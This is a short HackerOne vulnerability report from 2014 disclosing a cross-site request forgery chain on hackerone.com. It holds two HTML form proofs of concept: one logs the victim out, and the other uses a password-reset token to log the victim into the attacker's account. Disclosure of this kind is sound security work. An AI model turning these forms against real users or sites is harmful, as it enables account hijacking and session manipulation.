HackerOne: Switching the user to the attacker's account

ID H1:727
Type hackerone
Reporter dawidczagan
Modified 2014-02-20T00:04:27


Two requests are needed to make it happen.

Request1 (log out the user):

<html> <body> <form action="https://hackerone.com/users/sign_out" method="POST"> <input type="hidden" name="_method" value="delete" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Request2 (log in the user to the attacker's account):

<html> <body> <form action="https://hackerone.com/users/password" method="POST"> <input type="hidden" name="utf8" value="✓" /> <input type="hidden" name="_method" value="put" /> <input type="hidden" name="user[reset_password_token]" value="ENTER_HERE_RESET_PASSWORD_TOKEN_FROM_MAIL" /> <input type="hidden" name="user[password]" value="ENTER_HERE_NEW_PASSWORD" /> <input type="hidden" name="user[password_confirmation]" value="ENTER_HERE_NEW_PASSWORD" /> <input type="hidden" name="commit" value="Change password" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Please let me know if more detailed description is needed.

Regards, Dawid Czagan